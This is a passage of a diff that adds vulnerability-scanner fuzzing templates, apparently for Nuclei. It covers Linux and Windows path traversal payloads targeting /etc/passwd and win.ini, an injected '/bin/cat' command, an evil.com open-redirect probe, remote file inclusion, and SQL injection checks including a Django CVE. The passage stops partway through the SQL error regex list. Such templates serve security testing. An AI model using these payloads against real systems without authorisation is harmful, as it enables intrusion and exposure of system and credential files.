- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- 'root:.*?:[0-9]*:[0-9]*:'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'for 16-bit app support'
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- '(<web-app[\s\S]+<\/web-app>)'
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- '(<system.webServer[\s\S]+<\/system.webServer>)'
|
|
@ -0,0 +1,78 @@
|
||||||
|
id: linux-lfi-fuzz
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Local File Inclusion - Linux
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: high
|
||||||
|
reference:
|
||||||
|
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/directory_traversal.txt
|
||||||
|
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
|
||||||
|
tags: lfi,dast,linux,fuzz
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}'
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
nix_fuzz:
|
||||||
|
- '/etc/passwd'
|
||||||
|
- '../../etc/passwd'
|
||||||
|
- '../../../etc/passwd'
|
||||||
|
- '/../../../../etc/passwd'
|
||||||
|
- '../../../../../../../../../etc/passwd'
|
||||||
|
- '../../../../../../../../etc/passwd'
|
||||||
|
- '../../../../../../../etc/passwd'
|
||||||
|
- '../../../../../../etc/passwd'
|
||||||
|
- '../../../../../etc/passwd'
|
||||||
|
- '../../../../etc/passwd'
|
||||||
|
- '../../../etc/passwd'
|
||||||
|
- '../../../etc/passwd%00'
|
||||||
|
- '../../../../../../../../../../../../etc/passwd%00'
|
||||||
|
- '../../../../../../../../../../../../etc/passwd'
|
||||||
|
- '/../../../../../../../../../../etc/passwd^^'
|
||||||
|
- '/../../../../../../../../../../etc/passwd'
|
||||||
|
- '/./././././././././././etc/passwd'
|
||||||
|
- '\..\..\..\..\..\..\..\..\..\..\etc\passwd'
|
||||||
|
- '..\..\..\..\..\..\..\..\..\..\etc\passwd'
|
||||||
|
- '/..\../..\../..\../..\../..\../..\../etc/passwd'
|
||||||
|
- '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd'
|
||||||
|
- '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
|
||||||
|
- '..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
|
||||||
|
- '%252e%252e%252fetc%252fpasswd'
|
||||||
|
- '%252e%252e%252fetc%252fpasswd%00'
|
||||||
|
- '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
|
||||||
|
- '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00'
|
||||||
|
- '....//....//etc/passwd'
|
||||||
|
- '..///////..////..//////etc/passwd'
|
||||||
|
- '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd'
|
||||||
|
- '%0a/bin/cat%20/etc/passwd'
|
||||||
|
- '%00/etc/passwd%00'
|
||||||
|
- '%00../../../../../../etc/passwd'
|
||||||
|
- '/../../../../../../../../../../../etc/passwd%00.jpg'
|
||||||
|
- '/../../../../../../../../../../../etc/passwd%00.html'
|
||||||
|
- '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd'
|
||||||
|
- '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
|
||||||
|
- '\\'/bin/cat%20/etc/passwd\\''
|
||||||
|
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
|
||||||
|
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
|
||||||
|
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
|
||||||
|
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
|
||||||
|
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
|
||||||
|
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
|
||||||
|
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
|
||||||
|
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
|
||||||
|
|
||||||
|
fuzzing:
|
||||||
|
- part: query
|
||||||
|
type: replace # replaces existing parameter value with fuzz payload
|
||||||
|
mode: multiple # replaces all parameters value with fuzz payload
|
||||||
|
fuzz:
|
||||||
|
- '{{nix_fuzz}}'
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- 'root:.*:0:0:'
|
|
@ -0,0 +1,71 @@
|
||||||
|
id: windows-lfi-fuzz
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Local File Inclusion - Windows
|
||||||
|
author: pussycat0x
|
||||||
|
severity: high
|
||||||
|
tags: lfi,windows,dast,fuzz
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}'
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
win_fuzz:
|
||||||
|
- '\WINDOWS\win.ini'
|
||||||
|
- '\WINDOWS\win.ini'
|
||||||
|
- '\WINDOWS\win.ini%00'
|
||||||
|
- '\WINNT\win.ini'
|
||||||
|
- '\WINNT\win.ini%00'
|
||||||
|
- 'windows/win.ini%00'
|
||||||
|
- '../../windows/win.ini'
|
||||||
|
- '....//....//windows/win.ini'
|
||||||
|
- '/../../../../../../../../../../../../../../../../&location=Windows/win.ini'
|
||||||
|
- '../../../../../windows/win.ini'
|
||||||
|
- '/..///////..////..//////windows/win.ini'
|
||||||
|
- '/../../../../../../../../../windows/win.ini'
|
||||||
|
- './../../../../../../../../../../windows/win.ini'
|
||||||
|
- '/...\...\...\...\...\...\...\...\...\windows\win.ini'
|
||||||
|
- '/.../.../.../.../.../.../.../.../.../windows/win.ini'
|
||||||
|
- '/..../..../..../..../..../..../..../..../..../windows/win.ini'
|
||||||
|
- '/....\....\....\....\....\....\....\....\....\windows\win.ini'
|
||||||
|
- '\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini'
|
||||||
|
- '/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini'
|
||||||
|
- '..%2f..%2f..%2f..%2fwindows/win.ini'
|
||||||
|
- '..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
|
||||||
|
- '..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
|
||||||
|
- '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
|
||||||
|
- '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00'
|
||||||
|
- '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini'
|
||||||
|
- '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
|
||||||
|
- '/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini'
|
||||||
|
- '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini'
|
||||||
|
- '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini'
|
||||||
|
- '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini'
|
||||||
|
- '/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
|
||||||
|
- '%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini'
|
||||||
|
- '%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
|
||||||
|
- '/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini'
|
||||||
|
- '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini'
|
||||||
|
- '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini'
|
||||||
|
- '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
|
||||||
|
- '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini'
|
||||||
|
- '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini'
|
||||||
|
|
||||||
|
fuzzing:
|
||||||
|
- part: query
|
||||||
|
type: replace # replaces existing parameter value with fuzz payload
|
||||||
|
mode: multiple # replaces all parameters value with fuzz payload
|
||||||
|
fuzz:
|
||||||
|
- '{{win_fuzz}}'
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "bit app support"
|
||||||
|
- "fonts"
|
||||||
|
- "extensions"
|
||||||
|
condition: and
|
|
@ -0,0 +1,180 @@
|
||||||
|
id: open-redirect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Open Redirect Detection
|
||||||
|
author: princechaddha
|
||||||
|
severity: medium
|
||||||
|
tags: redirect,dast,fuzz
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
redirect:
|
||||||
|
- "evil.com"
|
||||||
|
|
||||||
|
fuzzing:
|
||||||
|
- part: query
|
||||||
|
mode: single
|
||||||
|
keys:
|
||||||
|
- AuthState
|
||||||
|
- URL
|
||||||
|
- _url
|
||||||
|
- callback
|
||||||
|
- checkout
|
||||||
|
- checkout_url
|
||||||
|
- content
|
||||||
|
- continue
|
||||||
|
- continueTo
|
||||||
|
- counturl
|
||||||
|
- data
|
||||||
|
- dest
|
||||||
|
- dest_url
|
||||||
|
- destination
|
||||||
|
- dir
|
||||||
|
- document
|
||||||
|
- domain
|
||||||
|
- done
|
||||||
|
- download
|
||||||
|
- feed
|
||||||
|
- file
|
||||||
|
- file_name
|
||||||
|
- file_url
|
||||||
|
- folder
|
||||||
|
- folder_url
|
||||||
|
- forward
|
||||||
|
- from_url
|
||||||
|
- go
|
||||||
|
- goto
|
||||||
|
- host
|
||||||
|
- html
|
||||||
|
- http
|
||||||
|
- https
|
||||||
|
- image
|
||||||
|
- image_src
|
||||||
|
- image_url
|
||||||
|
- imageurl
|
||||||
|
- img
|
||||||
|
- img_url
|
||||||
|
- include
|
||||||
|
- langTo
|
||||||
|
- load_file
|
||||||
|
- load_url
|
||||||
|
- login_to
|
||||||
|
- login_url
|
||||||
|
- logout
|
||||||
|
- media
|
||||||
|
- navigation
|
||||||
|
- next
|
||||||
|
- next_page
|
||||||
|
- open
|
||||||
|
- out
|
||||||
|
- page
|
||||||
|
- page_url
|
||||||
|
- pageurl
|
||||||
|
- path
|
||||||
|
- picture
|
||||||
|
- port
|
||||||
|
- proxy
|
||||||
|
- r
|
||||||
|
- r2
|
||||||
|
- redir
|
||||||
|
- redirect
|
||||||
|
- redirectUri
|
||||||
|
- redirectUrl
|
||||||
|
- redirect_to
|
||||||
|
- redirect_uri
|
||||||
|
- redirect_url
|
||||||
|
- reference
|
||||||
|
- referrer
|
||||||
|
- req
|
||||||
|
- request
|
||||||
|
- ret
|
||||||
|
- retUrl
|
||||||
|
- return
|
||||||
|
- returnTo
|
||||||
|
- return_path
|
||||||
|
- return_to
|
||||||
|
- return_url
|
||||||
|
- rt
|
||||||
|
- rurl
|
||||||
|
- show
|
||||||
|
- site
|
||||||
|
- source
|
||||||
|
- src
|
||||||
|
- target
|
||||||
|
- to
|
||||||
|
- u
|
||||||
|
- uri
|
||||||
|
- url
|
||||||
|
- val
|
||||||
|
- validate
|
||||||
|
- view
|
||||||
|
- window
|
||||||
|
- back
|
||||||
|
- cgi
|
||||||
|
- follow
|
||||||
|
- home
|
||||||
|
- jump
|
||||||
|
- link
|
||||||
|
- location
|
||||||
|
- menu
|
||||||
|
- move
|
||||||
|
- nav
|
||||||
|
- orig_url
|
||||||
|
- out_url
|
||||||
|
- query
|
||||||
|
- auth
|
||||||
|
- callback_url
|
||||||
|
- confirm_url
|
||||||
|
- destination_url
|
||||||
|
- domain_url
|
||||||
|
- entry
|
||||||
|
- exit
|
||||||
|
- forward_url
|
||||||
|
- go_to
|
||||||
|
- goto_url
|
||||||
|
- home_url
|
||||||
|
- image_link
|
||||||
|
- load
|
||||||
|
- logout_url
|
||||||
|
- nav_to
|
||||||
|
- origin
|
||||||
|
- page_link
|
||||||
|
- redirect_link
|
||||||
|
- ref
|
||||||
|
- referrer_url
|
||||||
|
- return_link
|
||||||
|
- return_to_url
|
||||||
|
- source_url
|
||||||
|
- target_url
|
||||||
|
- to_url
|
||||||
|
- validate_url
|
||||||
|
- DirectTo
|
||||||
|
- relay
|
||||||
|
|
||||||
|
fuzz:
|
||||||
|
- "https://{{redirect}}"
|
||||||
|
|
||||||
|
- part: query
|
||||||
|
mode: single
|
||||||
|
values:
|
||||||
|
- "https?://" # Replace HTTP URLs with alternatives
|
||||||
|
fuzz:
|
||||||
|
- "https://{{redirect}}"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: header
|
||||||
|
regex:
|
||||||
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 301
|
||||||
|
- 302
|
||||||
|
- 307
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: rfi
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Remote File Inclusion
|
||||||
|
author: m4lwhere
|
||||||
|
severity: high
|
||||||
|
reference:
|
||||||
|
- https://www.invicti.com/learn/remote-file-inclusion-rfi/
|
||||||
|
tags: rfi,dast,oast,fuzz
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
rfi:
|
||||||
|
- "https://rfi.nessus.org/rfi.txt"
|
||||||
|
|
||||||
|
fuzzing:
|
||||||
|
- part: query
|
||||||
|
mode: single
|
||||||
|
fuzz:
|
||||||
|
- "{{rfi}}"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body # Confirms the PHP was executed
|
||||||
|
words:
|
||||||
|
- "NessusCodeExecTest"
|
|
@ -0,0 +1,45 @@
|
||||||
|
id: CVE-2022-34265
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Django - SQL injection
|
||||||
|
author: princechaddha
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
An issue was discovered in Django 3.2 before 3.2.14 and 4.0 before 4.0.6. The Trunc() and Extract() database functions are subject to SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected.
|
||||||
|
reference:
|
||||||
|
- https://github.com/vulhub/vulhub/tree/master/django/CVE-2022-34265
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-34265
|
||||||
|
- https://www.djangoproject.com/weblog/2022/jul/04/security-releases/
|
||||||
|
- https://docs.djangoproject.com/en/4.0/releases/security/
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-34265
|
||||||
|
cwe-id: CWE-89
|
||||||
|
tags: sqli,dast,vulhub,cve,cve2022,django,fuzz
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand_string: '{{rand_text_alpha(15, "abc")}}'
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
fuzzing:
|
||||||
|
- part: query
|
||||||
|
fuzz:
|
||||||
|
- "test'{{rand_string}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'syntax error at or near "{{rand_string}}"'
|
||||||
|
- 'LINE 1: SELECT DATE_TRUNC'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 500
|
|
@ -0,0 +1,492 @@
|
||||||
|
id: sqli-error-based
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Error based SQL Injection
|
||||||
|
author: geeknik,pdteam
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
Direct SQL Command Injection is a technique where an attacker creates or alters existing SQL commands to expose hidden data,
|
||||||
|
or to override valuable ones, or even to execute dangerous system level commands on the database host.
|
||||||
|
This is accomplished by the application taking user input and combining it with static parameters to build an SQL query .
|
||||||
|
tags: sqli,error,dast,fuzz
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
injection:
|
||||||
|
- "'"
|
||||||
|
- "\""
|
||||||
|
- ";"
|
||||||
|
|
||||||
|
fuzzing:
|
||||||
|
- part: query
|
||||||
|
type: postfix
|
||||||
|
fuzz:
|
||||||
|
- "{{injection}}"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "Adminer"
|
||||||
|
negative: true
|
||||||
|
# False Positive
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
# MySQL
|
||||||
|
- "SQL syntax.*?MySQL"
|
||||||
|
- "Warning.*?\\Wmysqli?_"
|
||||||
|
- "MySQLSyntaxErrorException"
|
||||||
|
- "valid MySQL result"
|
||||||
|
- "check the manual that (corresponds to|fits) your MySQL server version"
|
||||||
|
- "Unknown column '[^ ]+' in 'field list'"
|
||||||
|
- "MySqlClient\\."
|
||||||
|
- "com\\.mysql\\.jdbc"
|
||||||
|
- "Zend_Db_(Adapter|Statement)_Mysqli_Exception"
|
||||||
|
- "Pdo[./_\\\\]Mysql"
|
||||||
|
- "MySqlException"
|
||||||
|
- "SQLSTATE\\[\\d+\\]: Syntax error or access violation"
|
||||||
|
# MariaDB
|
||||||
|
- "check the manual that (corresponds to|fits) your MariaDB server version"
|
||||||
|
# Drizzle
|
||||||
|
- "check the manual that (corresponds to|fits) your Drizzle server version"
|
||||||
|
# MemSQL
|
||||||
|
- "MemSQL does not support this type of query"
|
||||||
|
- "is not supported by MemSQL"
|
||||||
|
- "unsupported nested scalar subselect"
|
||||||
|
# PostgreSQL
|
||||||
|
- "PostgreSQL.*?ERROR"
|
||||||
|
- "Warning.*?\\Wpg_"
|
||||||
|
- "valid PostgreSQL result"
|
||||||
|
- "Npgsql\\."
|
||||||
|
- "PG::SyntaxError:"
|
||||||
|
- "org\\.postgresql\\.util\\.PSQLException"
|
||||||
|
- "ERROR:\\s\\ssyntax error at or near"
|
||||||
|
- "ERROR: parser: parse error at or near"
|
||||||
|
- "PostgreSQL query failed"
|
||||||
|
- "org\\.postgresql\\.jdbc"
|
||||||
|
- "Pdo[./_\\\\]Pgsql"
|
||||||
|
- "PSQLException"
|
||||||
|
# Microsoft SQL Server
|
||||||
|
- "Driver.*? SQL[\\-\\_\\ ]*Server"
|
||||||
|
- "OLE DB.*? SQL Server"
|
||||||
|
- "\\bSQL Server[^<"]+Driver"
|
||||||
|
- "Warning.*?\\W(mssql|sqlsrv)_"
|
||||||
|
- "\\bSQL Server[^<"]+[0-9a-fA-F]{8}"
|
||||||
|
- "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)"
|
||||||
|
- "(?s)Exception.*?\\bRoadhouse\\.Cms\\."
|
||||||
|
- "Microsoft SQL Native Client error '[0-9a-fA-F]{8}"
|
||||||
|
- "\\[SQL Server\\]"
|
||||||
|
- "ODBC SQL Server Driver"
|
||||||
|
- "ODBC Driver \\d+ for SQL Server"
|
||||||
|
- "SQLServer JDBC Driver"
|
||||||
|
- "com\\.jnetdirect\\.jsql"
|
||||||
|
- "macromedia\\.jdbc\\.sqlserver"
|
||||||
|
- "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception"
|
||||||
|
- "com\\.microsoft\\.sqlserver\\.jdbc"
|
||||||
|
- "Pdo[./_\\\\](Mssql|SqlSrv)"
|
||||||
|
- "SQL(Srv|Server)Exception"
|
||||||
|
- "Unclosed quotation mark after the character string"
|
||||||
|
# Microsoft Access
|
||||||
|
- "Microsoft Access (\\d+ )?Driver"
|
||||||
|
- "JET Database Engine"
|
||||||
|
- "Access Database Engine"
|
||||||
|
- "ODBC Microsoft Access"
|
||||||
|
- "Syntax error \\(missing operator\\) in query expression"
|
||||||
|
# Oracle
|
||||||
|
- "\\bORA-\\d{5}"
|
||||||
|
- "Oracle error"
|
||||||
|
- "Oracle.*?Driver"
|
||||||
|
- "Warning.*?\\W(oci|ora)_"
|
||||||
|
- "quoted string not properly terminated"
|
||||||
|
- "SQL command not properly ended"
|
||||||
|
- "macromedia\\.jdbc\\.oracle"
|
||||||
|
- "oracle\\.jdbc"
|
||||||
|
- "Zend_Db_(Adapter|Statement)_Oracle_Exception"
|
||||||
|
- "Pdo[./_\\\\](Oracle|OCI)"
|
||||||
|
- "OracleException"
|
||||||
|
# IBM DB2
|
||||||
|
- "CLI Driver.*?DB2"
|
||||||
|
- "DB2 SQL error"
|
||||||
|
- "\\bdb2_\\w+\\("
|
||||||
|
- "SQLCODE[=:\\d, -]+SQLSTATE"
|
||||||
|
- "com\\.ibm\\.db2\\.jcc"
|
||||||
|
- "Zend_Db_(Adapter|Statement)_Db2_Exception"
|
||||||
|
- "Pdo[./_\\\\]Ibm"
|
||||||
|
- "DB2Exception"
|
||||||
|
- "ibm_db_dbi\\.ProgrammingError"
|
||||||
|
# Informix
|
||||||
|
- "Warning.*?\\Wifx_"
|
||||||
|
- "Exception.*?Informix"
|
||||||
|
- "Informix ODBC Driver"
|
||||||
|
- "ODBC Informix driver"
|
||||||
|
- "com\\.informix\\.jdbc"
|
||||||
|
- "weblogic\\.jdbc\\.informix"
|
||||||
|
- "Pdo[./_\\\\]Informix"
|
||||||
|
- "IfxException"
|
||||||
|
# Firebird
|
||||||
|
- "Dynamic SQL Error"
|
||||||
|
- "Warning.*?\\Wibase_"
|
||||||
|
- "org\\.firebirdsql\\.jdbc"
|
||||||
|
- "Pdo[./_\\\\]Firebird"
|
||||||
|
# SQLite
|
||||||
|
- "SQLite/JDBCDriver"
|
||||||
|
- "SQLite\\.Exception"
|
||||||
|
- "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException"
|
||||||
|
- "Warning.*?\\W(sqlite_|SQLite3::)"
|
||||||
|
- "\\[SQLITE_ERROR\\]"
|
||||||
|
- "SQLite error \\d+:"
|
||||||
|
- "sqlite3.OperationalError:"
|
||||||
|
- "SQLite3::SQLException"
|
||||||
|
- "org\\.sqlite\\.JDBC"
|
||||||
|
- "Pdo[./_\\\\]Sqlite"
|
||||||
|
- "SQLiteException"
|
||||||
|
# SAP MaxDB
|
||||||
|
- "SQL error.*?POS([0-9]+)"
|
||||||
|
- "Warning.*?\\Wmaxdb_"
|
||||||
|
- "DriverSapDB"
|
||||||
|
- "-3014.*?Invalid end of SQL statement"
|
||||||
|
- "com\\.sap\\.dbtech\\.jdbc"
|
||||||
|
- "\\[-3008\\].*?: Invalid keyword or missing delimiter"
|
||||||
|
# Sybase
|
||||||
|
- "Warning.*?\\Wsybase_"
|
||||||
|
- "Sybase message"
|
||||||
|
- "Sybase.*?Server message"
|
||||||
|
- "SybSQLException"
|
||||||
|
- "Sybase\\.Data\\.AseClient"
|
||||||
|
- "com\\.sybase\\.jdbc"
|
||||||
|
# Ingres
|
||||||
|
- "Warning.*?\\Wingres_"
|
||||||
|
- "Ingres SQLSTATE"
|
||||||
|
- "Ingres\\W.*?Driver"
|
||||||
|
- "com\\.ingres\\.gcf\\.jdbc"
|
||||||
|
# FrontBase
|
||||||
|
- "Exception (condition )?\\d+\\. Transaction rollback"
|
||||||
|
- "com\\.frontbase\\.jdbc"
|
||||||
|
- "Syntax error 1. Missing"
|
||||||
|
- "(Semantic|Syntax) error [1-4]\\d{2}\\."
|
||||||
|
# HSQLDB
|
||||||
|
- "Unexpected end of command in statement \\["
|
||||||
|
- "Unexpected token.*?in statement \\["
|
||||||
|
- "org\\.hsqldb\\.jdbc"
|
||||||
|
# H2
|
||||||
|
- "org\\.h2\\.jdbc"
|
||||||
|
- "\\[42000-192\\]"
|
||||||
|
# MonetDB
|
||||||
|
- "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)"
|
||||||
|
- "\\[MonetDB\\]\\[ODBC Driver"
|
||||||
|
- "nl\\.cwi\\.monetdb\\.jdbc"
|
||||||
|
# Apache Derby
|
||||||
|
- "Syntax error: Encountered"
|
||||||
|
- "org\\.apache\\.derby"
|
||||||
|
- "ERROR 42X01"
|
||||||
|
# Vertica
|
||||||
|
- ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):"
|
||||||
|
- "/vertica/Parser/scan"
|
||||||
|
- "com\\.vertica\\.jdbc"
|
||||||
|
- "org\\.jkiss\\.dbeaver\\.ext\\.vertica"
|
||||||
|
- "com\\.vertica\\.dsi\\.dataengine"
|
||||||
|
# Mckoi
|
||||||
|
- "com\\.mckoi\\.JDBCDriver"
|
||||||
|
- "com\\.mckoi\\.database\\.jdbc"
|
||||||
|
- "<REGEX_LITERAL>"
|
||||||
|
# Presto
|
||||||
|
- "com\\.facebook\\.presto\\.jdbc"
|
||||||
|
- "io\\.prestosql\\.jdbc"
|
||||||
|
- "com\\.simba\\.presto\\.jdbc"
|
||||||
|
- "UNION query has different number of fields: \\d+, \\d+"
|
||||||
|
# Altibase
|
||||||
|
- "Altibase\\.jdbc\\.driver"
|
||||||
|
# MimerSQL
|
||||||
|
- "com\\.mimer\\.jdbc"
|
||||||
|
- "Syntax error,[^\\n]+assumed to mean"
|
||||||
|
# CrateDB
|
||||||
|
- "io\\.crate\\.client\\.jdbc"
|
||||||
|
# Cache
|
||||||
|
- "encountered after end of query"
|
||||||
|
- "A comparison operator is required here"
|
||||||
|
# Raima Database Manager
|
||||||
|
- "-10048: Syntax error"
|
||||||
|
- "rdmStmtPrepare\\(.+?\\) returned"
|
||||||
|
# Virtuoso
|
||||||
|
- "SQ074: Line \\d+:"
|
||||||
|
- "SR185: Undefined procedure"
|
||||||
|
- "SQ200: No table "
|
||||||
|
- "Virtuoso S0002 Error"
|
||||||
|
- "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]"
|
||||||
|
condition: or
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: mysql
|
||||||
|
regex:
|
||||||
|
- "SQL syntax.*?MySQL"
|
||||||
|
- "Warning.*?\\Wmysqli?_"
|
||||||
|
- "MySQLSyntaxErrorException"
|
||||||
|
- "valid MySQL result"
|
||||||
|
- "check the manual that (corresponds to|fits) your MySQL server version"
|
||||||
|
- "Unknown column '[^ ]+' in 'field list'"
|
||||||
|
- "MySqlClient\\."
|
||||||
|
- "com\\.mysql\\.jdbc"
|
||||||
|
- "Zend_Db_(Adapter|Statement)_Mysqli_Exception"
|
||||||
|
- "Pdo[./_\\\\]Mysql"
|
||||||
|
- "MySqlException"
|
||||||
|
- "SQLSTATE[\\d+]: Syntax error or access violation"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: mariadb
|
||||||
|
regex:
|
||||||
|
